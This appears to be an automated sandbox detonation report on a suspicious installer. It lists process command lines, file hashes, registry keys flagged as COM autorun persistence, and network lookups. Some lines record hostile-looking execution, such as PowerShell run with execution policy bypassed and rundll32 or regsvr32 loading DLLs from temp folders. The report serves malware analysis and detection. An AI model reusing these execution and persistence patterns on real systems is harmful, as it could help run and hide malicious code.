C:\Windows\system32\msiexec.exe

msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\setup.msi

C:\Windows\system32\msiexec.exe

C:\Windows\system32\msiexec.exe /V

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding 241B6E2EB6BB5EC42232CF7129F45F46

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

-NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\pss899D.ps1" -propFile "C:\Users\Admin\AppData\Local\Temp\msi898A.txt" -scriptFile "C:\Users\Admin\AppData\Local\Temp\scr898B.ps1" -scriptArgsFile "C:\Users\Admin\AppData\Local\Temp\scr898C.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue."

Network

N/A

Files

C:\Windows\Installer\MSI82D6.tmp

MD5 b158d8d605571ea47a238df5ab43dfaa
SHA1 bb91ae1f2f7142b9099e3cc285f4f5b84de568e4
SHA256 ca763693cc25d316f14a9ebad80ebf00590329550c45adb7e5205486533c2504
SHA512 56aef59c198acf2fcd0d95ea6e32ce1c706e5098a0800feff13ddb427bfb4d538de1c415a5cb5496b09a5825155e3abb1c13c8c37dc31549604bd4d63cb70591

C:\Windows\Installer\MSI86C0.tmp

MD5 fb4665320c9da54598321c59cc5ed623
SHA1 89e87b3cc569edd26b5805244cfacb2f9c892bc7
SHA256 9fb3156c665211a0081b189142c1d1ab18cda601ee54d5f5d8883ecfa4177a59
SHA512 b205552a3cfbaa2202e6ef7e39e229af167b2342a7dc4a2f4cadfe4d05000966cf19e9e208e44d6bb0fd6a56f4283caeed9c13f523e5b301b87f79febb1840cf

C:\Users\Admin\AppData\Local\Temp\pss899D.ps1

MD5 30c30ef2cb47e35101d13402b5661179
SHA1 25696b2aab86a9233f19017539e2dd83b2f75d4e
SHA256 53094df6fa4e57a3265ff04bc1e970c10bcdb3d4094ad6dd610c05b7a8b79e0f
SHA512 882be2768138bb75ff7dde7d5ca4c2e024699398baacd0ce1d4619902402e054297e4f464d8cb3c22b2f35d3dabc408122c207facad64ec8014f2c54834cf458

C:\Users\Admin\AppData\Local\Temp\scr898B.ps1

MD5 d4b8bc496cf855ed58e06057d746ae63
SHA1 027b241446c405a4dd0b2f11ff707419a60160b7
SHA256 ecf3115cdeae2636cd1b0d13d80b92e51908f7c561f8b6a1da105ac253b3490d
SHA512 a3592de4d167ddfb77d41e18b2b63579f180479a3b99237749087c415efb8c6a4bfabfc9016e7eeb9114377280f97a5d60f4519f1aa6f2222ab3017bcf4bfe86

C:\Users\Admin\AppData\Local\Temp\msi898A.txt

MD5 9f5bffbb1f8f8340bf45e22a09517ee1
SHA1 a5566c63b3681cd56e3b76ed528449ca33a36cc6
SHA256 4ca8664da66ad8c90ce03725f92bf7571cf86a290a9ec4a073dad293a60836ef
SHA512 8b1b1d13de5aee1748428ffe1ee6131a63e819df8dd42088b7d581ff957adb30e12ba3637e00fac7d7b5aa71a5e35ce09f52772d38f1c441adb19e5e2cd05423

C:\Config.Msi\f76823e.rbs

MD5 13bac3d7e14611a5db46ac6ae6e7e363
SHA1 fc938f3d3f03b006bed6f30d330082f8cb2c2ece
SHA256 d74c9c546695b8bbdcafa36be4bf44605700bd11adba3195b41392a9ade8352d
SHA512 8676563e8ab891e3df073c3c47281b6bf575ace4290a60b479db8af7cc5754f8de7ee733a8c19c934b645af911c4aa06fad6f4bf28112dfd0ab894589bab077b

C:\Users\Admin\AppData\Roaming\Uifie Public Co\JoisApp\tier0_s64.dll

MD5 7e60404cfb232a1d3708a9892d020e84
SHA1 31328d887bee17641608252fb2f9cd6caf8ba522
SHA256 5a3e15cb90baf4b3ebe0621fa6f5f37b0fe99848387d6f2fd99ae770d1e6d766
SHA512 4d8abd59bd77bdb6e5b5e5f902d2a10fa5136437c51727783e79aed6a796f9ee1807faf14f1a72a1341b9f868f61de8c676b00a4b07a2a26cfb8a4db1b77eb3c

C:\Windows\Installer\f76823a.msi

MD5 018608eea246419a1099d81b42918305
SHA1 80dc106adb71dbac9582cd7df099a818075f2947
SHA256 4cfa6da558a68a1f0a0ff4c8b029d4e8ebf9a406ed3e01f9b8099cd2b89f3e20
SHA512 57721772502585cc28cb8159e7cd44801fc843af4036de77302d7f153d9dc546e88903d73ff2bed8ecb3288f44fb21079ce3d3cce2912d5a3617bb933da5fd4d

Analysis: behavioral23

Detonation Overview

Submitted

2024-06-12 17:20

Reported

2024-06-12 17:23

Platform

win10v2004-20240611-en

Max time kernel

147s

Max time network

156s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\tapiui\tapiui.dll,#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\tapiui\tapiui.dll,#1

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
NL 23.62.61.72:443 www.bing.com tcp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 14.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 72.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 74.83.221.88.in-addr.arpa udp
US 8.8.8.8:53 98.83.221.88.in-addr.arpa udp
US 8.8.8.8:53 14.227.111.52.in-addr.arpa udp

Files

N/A

Analysis: behavioral9

Detonation Overview

Submitted

2024-06-12 17:20

Reported

2024-06-12 17:23

Platform

win10v2004-20240508-en

Max time kernel

146s

Max time network

157s

Command Line

regsvr32 /s C:\Users\Admin\AppData\Local\Temp\Wpc\Windows.Web.dll

Signatures

Registers COM server for autorun

persistence
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{37903486-85EE-4733-AEFC-8C4496F19DE4}\InProcServer32 C:\Windows\system32\regsvr32.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{F1C031C8-90BF-5CAE-ADF6-155B4AEDFB60} C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{2a9228fa-b088-5690-bb38-b7044e0b502b} C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{F71CFF65-E737-5345-B38F-FD445D2DC7E2} C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9768B379-FB2B-4F6D-B41C-088A5868825C}\NumMethods C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{1ffb57b2-d2de-5559-8de2-50109c63539b} C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{c6919f6a-66d9-556a-9632-87d39af14638}\NumMethods C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{12902188-4ACB-49A8-B777-A5EB92E18A79}\NumMethods\ = "7" C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{AB772CD6-8CE7-5DB9-83AC-0DB9E44A1B0C} C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9496279b-567e-5652-b942-f6fb70c34173}\ProxyStubClsid32 C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{8a796ea9-ff95-50ef-93ea-711bf7946473}\ProxyStubClsid32 C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{2DC8D9D6-0F44-5692-933E-F8902AB7FB94} C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9029D944-774E-4F96-9F74-C18974180B36} C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9496279b-567e-5652-b942-f6fb70c34173} C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{329eabe1-efcc-539e-96ba-f6a44f221dbd} C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{4477115D-E35C-5A07-B922-F897CE56333D} C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{548DB883-C384-45C1-8AE8-A378C4EC486C}\NumMethods C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{329EABE1-EFCC-539E-96BA-F6A44F221DBD} C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{4641FEFE-0E55-40D0-B8D0-6A2CCBA9FC7C}\ = "__x_Windows_CWeb_CSyndication_CISyndicationContent" C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{49D55012-57CB-4BDE-AB9F-2610B172777B}\ProxyStubClsid32\ = "{37903486-85EE-4733-AEFC-8C4496F19DE4}" C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{FE616766-BF27-4064-87B7-6563BB11CE2E} C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{1ffb57b2-d2de-5559-8de2-50109c63539b}\NumMethods C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{f1c031c8-90bf-5cae-adf6-155b4aedfb60} C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{A34083E3-1E26-4DBC-BA9D-1AB84BEFF97B}\ = "__x_Windows_CWeb_CSyndication_CISyndicationGeneratorFactory" C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{DA07ABF4-91FA-5C96-84CB-459EA97B934D}\NumMethods\ = "11" C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{F71CFF65-E737-5345-B38F-FD445D2DC7E2}\NumMethods\ = "11" C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{572a8cab-2af3-5c4f-bea7-de6852805b5b} C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{76772EC1-C26F-5F6E-8D3B-8314107CEFEB} C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{7F5FD609-BC88-41D4-88FA-3DE6704D428E}\ = "__x_Windows_CWeb_CAtomPub_CIResourceCollection" C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{55463eef-ecb8-59cd-8d6b-74daacbe7d19}\ProxyStubClsid32 C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{b8fb25a5-01c3-5207-814e-892b2b5343f7}\NumMethods C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{B9CC5E80-313A-4091-A2A6-243E0EE923F9} C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{A34083E3-1E26-4DBC-BA9D-1AB84BEFF97B}\ProxyStubClsid32\ = "{37903486-85EE-4733-AEFC-8C4496F19DE4}" C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{EE7342F7-11C6-4B25-AB62-E596BD162946}\ProxyStubClsid32\ = "{37903486-85EE-4733-AEFC-8C4496F19DE4}" C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0cc8c426-d68a-5136-9741-de326764ca32} C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{B41DA63B-A4B8-4036-89C5-83C31266BA49}\NumMethods C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{71E8F969-526E-4001-9A91-E84F83161AB1}\ProxyStubClsid32 C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{4641FEFE-0E55-40D0-B8D0-6A2CCBA9FC7C}\ProxyStubClsid32\ = "{37903486-85EE-4733-AEFC-8C4496F19DE4}" C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{DA07ABF4-91FA-5C96-84CB-459EA97B934D}\ProxyStubClsid32\ = "{37903486-85EE-4733-AEFC-8C4496F19DE4}" C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9de7422b-4bc3-5546-87b8-2eebfd60be48}\ProxyStubClsid32 C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{753CEF78-51F8-45C0-A9F5-F1719DEC3FB2} C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{a76fcde8-f86f-5b75-aa7d-5787467a319d}\NumMethods C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{1FBB2361-45C7-4833-8AA0-BE5F3B58A7F4}\ProxyStubClsid32\ = "{37903486-85EE-4733-AEFC-8C4496F19DE4}" C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0e450d3d-e750-5787-885b-488abc72b5b9}\NumMethods C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9E18A9B7-7249-4B45-B229-7DF895A5A1F5}\ProxyStubClsid32 C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{27553ABD-A10E-41B5-86BD-9759086EB0C5}\ProxyStubClsid32 C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{f1c031c8-90bf-5cae-adf6-155b4aedfb60}\ProxyStubClsid32 C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{d151f7d1-eabd-5300-b55c-149eb289cc71}\NumMethods C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{23472232-8BE9-48B7-8934-6205131D9357}\ProxyStubClsid32\ = "{37903486-85EE-4733-AEFC-8C4496F19DE4}" C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{B41DA63B-A4B8-4036-89C5-83C31266BA49} C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{DCF4886D-229D-4B58-A49B-F3D2F0F5C99F}\NumMethods\ = "8" C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{8B7EC771-2AB3-4DBE-8BCC-778F92B75E51}\ProxyStubClsid32 C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9768B379-FB2B-4F6D-B41C-088A5868825C}\ = "__x_Windows_CWeb_CSyndication_CISyndicationGenerator" C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{FA1EE5DA-A7C6-4517-A096-0143FAF29327} C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0e450d3d-e750-5787-885b-488abc72b5b9}\ProxyStubClsid32 C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{DA07ABF4-91FA-5C96-84CB-459EA97B934D}\ProxyStubClsid32 C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{B9CC5E80-313A-4091-A2A6-243E0EE923F9}\ = "__x_Windows_CWeb_CSyndication_CISyndicationText" C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{b486569a-72b3-57aa-9950-cea0b3e4fc58}\ProxyStubClsid32 C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9029D944-774E-4F96-9F74-C18974180B36}\ProxyStubClsid32\ = "{37903486-85EE-4733-AEFC-8C4496F19DE4}" C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{F71CFF65-E737-5345-B38F-FD445D2DC7E2}\ = "__FIAsyncOperationWithProgress_2_Windows__CStorage__CStreams__CIInputStream_Windows__CWeb__CSyndication__CRetrievalProgress" C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{71E8F969-526E-4001-9A91-E84F83161AB1}\NumMethods C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{ab772cd6-8ce7-5db9-83ac-0db9e44a1b0c} C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{c1d6d1cc-69ce-5486-9f35-c87e13111387}\ProxyStubClsid32 C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{7FFE3CD2-5B66-4D62-8403-1BC10D910D6B} C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{7FFE3CD2-5B66-4D62-8403-1BC10D910D6B}\NumMethods\ = "34" C:\Windows\system32\regsvr32.exe N/A

Processes

C:\Windows\system32\regsvr32.exe

regsvr32 /s C:\Users\Admin\AppData\Local\Temp\Wpc\Windows.Web.dll

Network

Files

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-12 17:20

Reported

2024-06-12 17:23

Platform

win7-20240611-en

Max time kernel

118s

Max time network

124s

Command Line

C:\Windows\Explorer.exe /idlist,,C:\Users\Admin\AppData\Local\Temp\__x64___setup___x32___.zip

Signatures

N/A

Processes

C:\Windows\Explorer.exe

C:\Windows\Explorer.exe /idlist,,C:\Users\Admin\AppData\Local\Temp\__x64___setup___x32___.zip

Network

N/A

Files

N/A

Analysis: behavioral19

Detonation Overview

Submitted

2024-06-12 17:20

Reported

2024-06-12 17:23

Platform

win10v2004-20240508-en

Max time kernel

144s

Max time network

159s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\ifsutil\ifsutil.dll,#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\ifsutil\ifsutil.dll,#1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=4200,i,10373433614523925616,13586256558317053467,262144 --variations-seed-version --mojo-platform-channel-handle=4028 /prefetch:8

Network

Files

N/A

Analysis: behavioral22

Detonation Overview

Submitted

2024-06-12 17:20

Reported

2024-06-12 17:23

Platform

win10v2004-20240611-en

Max time kernel

124s

Max time network

130s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\tapiui\SettingMonitor.dll,#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\tapiui\SettingMonitor.dll,#1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=4188,i,11069752405888604640,8928124405695604965,262144 --variations-seed-version --mojo-platform-channel-handle=2732 /prefetch:8

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
NL 23.62.61.97:443 www.bing.com tcp
US 8.8.8.8:53 2.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 88.156.103.20.in-addr.arpa udp
US 8.8.8.8:53 97.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 29.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 160.83.221.88.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp

Files

N/A

Analysis: behavioral24

Detonation Overview

Submitted

2024-06-12 17:20

Reported

2024-06-12 17:23

Platform

win10v2004-20240611-en

Max time kernel

149s

Max time network

155s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\tapiui\tcbloader.dll,#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\tapiui\tcbloader.dll,#1

Network

Country Destination Domain Proto
US 8.8.8.8:53 71.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 74.83.221.88.in-addr.arpa udp
US 8.8.8.8:53 0.204.248.87.in-addr.arpa udp
US 8.8.8.8:53 91.16.208.104.in-addr.arpa udp

Files

N/A

Analysis: behavioral25

Detonation Overview

Submitted

2024-06-12 17:20

Reported

2024-06-12 17:23

Platform

win10v2004-20240611-en

Max time kernel

146s

Max time network

154s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\tapiui\webcheck.dll,#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\tapiui\webcheck.dll,#1

Network

Country Destination Domain Proto
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
NL 23.62.61.194:443 www.bing.com tcp
US 8.8.8.8:53 23.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 194.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 88.156.103.20.in-addr.arpa udp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 160.83.221.88.in-addr.arpa udp
US 8.8.8.8:53 14.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 105.83.221.88.in-addr.arpa udp
US 8.8.8.8:53 5.173.189.20.in-addr.arpa udp

Files

N/A

Analysis: behavioral6

Detonation Overview

Submitted

2024-06-12 17:20

Reported

2024-06-12 17:23

Platform

win10v2004-20240508-en

Max time kernel

51s

Max time network

59s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\InputHost\Microsoft.Uev.SyncConditions.dll,#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\InputHost\Microsoft.Uev.SyncConditions.dll,#1

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp

Files

N/A

Analysis: behavioral7

Detonation Overview

Submitted

2024-06-12 17:20

Reported

2024-06-12 17:23

Platform

win10v2004-20240508-en

Max time kernel

78s

Max time network

102s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\InputHost\NgcCtnr.dll,#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\InputHost\NgcCtnr.dll,#1

Network

Country Destination Domain Proto
NL 52.111.243.31:443 tcp

Files

N/A

Analysis: behavioral14

Detonation Overview

Submitted

2024-06-12 17:20

Reported

2024-06-12 17:23

Platform

win10v2004-20240508-en

Max time kernel

51s

Max time network

52s

Command Line

regsvr32 /s C:\Users\Admin\AppData\Local\Temp\comuid\comuid.dll

Signatures

Registers COM server for autorun

persistence
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{016fd94e-b02a-4ab8-94c6-149fdab56b8d}\InProcServer32 C:\Windows\system32\regsvr32.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Interface C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{016FD94E-B02A-4AB8-94C6-149FDAB56B8D} C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{016fd94e-b02a-4ab8-94c6-149fdab56b8d}\ProxyStubClsid32 C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{016fd94e-b02a-4ab8-94c6-149fdab56b8d} C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{016FD94E-B02A-4AB8-94C6-149FDAB56B8D} C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{016fd94e-b02a-4ab8-94c6-149fdab56b8d}\InProcServer32 C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{016fd94e-b02a-4ab8-94c6-149fdab56b8d} C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{016fd94e-b02a-4ab8-94c6-149fdab56b8d}\NumMethods C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\CLSID C:\Windows\system32\regsvr32.exe N/A

Processes

C:\Windows\system32\regsvr32.exe

regsvr32 /s C:\Users\Admin\AppData\Local\Temp\comuid\comuid.dll

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp

Files

N/A

Analysis: behavioral16

Detonation Overview

Submitted

2024-06-12 17:20

Reported

2024-06-12 17:23

Platform

win10v2004-20240611-en

Max time kernel

149s

Max time network

158s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\ifsutil\VoipRT.dll,#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\ifsutil\VoipRT.dll,#1

Network

Country Destination Domain Proto
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 3.181.190.20.in-addr.arpa udp
NL 23.62.61.72:443 www.bing.com tcp
US 8.8.8.8:53 72.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 105.83.221.88.in-addr.arpa udp
US 8.8.8.8:53 11.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 98.83.221.88.in-addr.arpa udp
US 8.8.8.8:53 91.16.208.104.in-addr.arpa udp

Files

N/A

Analysis: behavioral5

Detonation Overview

Submitted

2024-06-12 17:20

Reported

2024-06-12 17:23

Platform

win7-20240611-en

Max time kernel

118s

Max time network

122s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\InputHost\Microsoft.Uev.SyncConditions.dll,#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\InputHost\Microsoft.Uev.SyncConditions.dll,#1

Network

N/A

Files

N/A

Analysis: behavioral3

Detonation Overview

Submitted

2024-06-12 17:20

Reported

2024-06-12 17:23

Platform

win10v2004-20240508-en

Max time kernel

79s

Max time network

100s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\InputHost\InputHost.dll,#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\InputHost\InputHost.dll,#1

Network

Country Destination Domain Proto
US 52.111.227.11:443 tcp

Files

N/A

Analysis: behavioral4

Detonation Overview

Submitted

2024-06-12 17:20

Reported

2024-06-12 17:23

Platform

win10v2004-20240611-en

Max time kernel

124s

Max time network

130s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\InputHost\KBDPL1.dll,#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\InputHost\KBDPL1.dll,#1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

